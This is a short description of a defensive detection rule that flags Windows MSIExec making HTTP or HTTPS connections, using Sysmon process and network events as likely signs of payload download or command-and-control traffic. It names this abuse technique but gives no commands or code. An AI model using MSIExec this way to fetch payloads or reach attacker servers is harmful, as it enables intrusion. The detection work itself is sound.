This rule detects unusual network activity associated with MSIExec, a Windows utility responsible for installing software. Typically, MSIExec does not engage in network communications; thus, any instance where it is observed making connections over common web ports 80 (HTTP) or 443 (HTTPS) is suspicious. The analytic combines process creation events gathered from Endpoint Detection and Response (EDR) agents with network traffic logs to identify such activity. This abnormal behavior is often indicative of malicious intent, such as downloading files or communicating with command and control servers, which can lead to significant security risks, including data exfiltration and further malware execution. The rule is based on detecting specific Sysmon events (EventID 1 and EventID 3) that record process creation and network connections, respectively. It is essential to implement proper logging and mapping to the data model to ensure effective detection.